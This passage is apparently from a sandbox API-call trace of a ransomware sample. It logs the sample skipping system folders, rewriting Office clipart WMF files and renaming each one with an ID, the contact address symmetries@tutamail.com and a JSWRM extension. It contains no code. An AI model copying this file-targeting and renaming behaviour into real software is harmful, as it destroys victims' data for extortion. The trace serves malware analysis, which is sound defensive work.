lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103262.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0080.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0080.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103262.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103262.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103262.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0080.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0080.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.569] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12900) returned 1 [0080.569] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3260) returned 0x24d210 [0080.569] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3260, lpOverlapped=0x0) returned 1 [0080.572] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.572] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3260, lpOverlapped=0x0) returned 1 [0080.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.572] CloseHandle (hObject=0x314) returned 1 [0080.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0080.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0080.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0080.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0080.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0080.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0080.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.573] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103262.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103262.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103262.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0080.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0080.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.573] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0103402.WMF", cAlternateFileName="")) returned 1 [0080.573] lstrcmpiW (lpString1="J0103402.WMF", lpString2=".") returned 1 [0080.573] lstrcmpiW (lpString1="J0103402.WMF", lpString2="..") returned 1 [0080.573] lstrcmpiW (lpString1="J0103402.WMF", lpString2="...") returned 1 [0080.573] lstrcmpiW (lpString1="J0103402.WMF", lpString2="windows") returned -1 [0080.573] lstrcmpiW (lpString1="J0103402.WMF", lpString2="recovery") returned -1 [0080.573] lstrcmpiW (lpString1="J0103402.WMF", lpString2="perflogs") returned -1 [0080.573] lstrcmpiW (lpString1="J0103402.WMF", lpString2="documents and settings") returned 1 [0080.574] lstrcmpiW (lpString1="J0103402.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.574] lstrcmpiW (lpString1="J0103402.WMF", lpString2="system volume information") returned -1 [0080.574] lstrcmpiW (lpString1="J0103402.WMF", lpString2="msocache") returned -1 [0080.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0080.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103402.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103402.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103402.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0080.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103402.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103402.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103402.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0080.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0080.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0080.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103402.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.575] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=44948) returned 1 [0080.575] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaf90) returned 0x24d210 [0080.575] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xaf90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xaf90, lpOverlapped=0x0) returned 1 [0080.579] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.579] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xaf90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xaf90, lpOverlapped=0x0) returned 1 [0080.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.580] CloseHandle (hObject=0x314) returned 1 [0080.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0080.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0080.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0080.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0080.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0080.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0080.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.581] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103402.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103402.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0080.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0080.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0080.581] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1714, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0103812.WMF", cAlternateFileName="")) returned 1 [0080.581] lstrcmpiW (lpString1="J0103812.WMF", lpString2=".") returned 1 [0080.581] lstrcmpiW (lpString1="J0103812.WMF", lpString2="..") returned 1 [0080.581] lstrcmpiW (lpString1="J0103812.WMF", lpString2="...") returned 1 [0080.581] lstrcmpiW (lpString1="J0103812.WMF", lpString2="windows") returned -1 [0080.581] lstrcmpiW (lpString1="J0103812.WMF", lpString2="recovery") returned -1 [0080.582] lstrcmpiW (lpString1="J0103812.WMF", lpString2="perflogs") returned -1 [0080.582] lstrcmpiW (lpString1="J0103812.WMF", lpString2="documents and settings") returned 1 [0080.582] lstrcmpiW (lpString1="J0103812.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.582] lstrcmpiW (lpString1="J0103812.WMF", lpString2="system volume information") returned -1 [0080.582] lstrcmpiW (lpString1="J0103812.WMF", lpString2="msocache") returned -1 [0080.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0080.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103812.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103812.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103812.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0080.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0080.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103812.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103812.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103812.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0080.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0080.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0080.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103812.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.582] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5908) returned 1 [0080.582] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1710) returned 0x205850 [0080.583] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1710, lpOverlapped=0x0) returned 1 [0080.584] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.585] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1710, lpOverlapped=0x0) returned 1 [0080.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.585] CloseHandle (hObject=0x314) returned 1 [0080.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0080.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0080.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0080.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0080.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0080.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0080.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.585] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103812.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103812.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103812.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0080.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0080.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0080.586] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c2c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0103850.WMF", cAlternateFileName="")) returned 1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2=".") returned 1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="..") returned 1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="...") returned 1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="windows") returned -1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="recovery") returned -1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="perflogs") returned -1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="documents and settings") returned 1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="system volume information") returned -1 [0080.586] lstrcmpiW (lpString1="J0103850.WMF", lpString2="msocache") returned -1 [0080.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0080.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103850.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103850.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103850.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0080.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0080.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103850.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103850.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103850.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0080.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0080.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103850.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.587] GetFileSizeEx 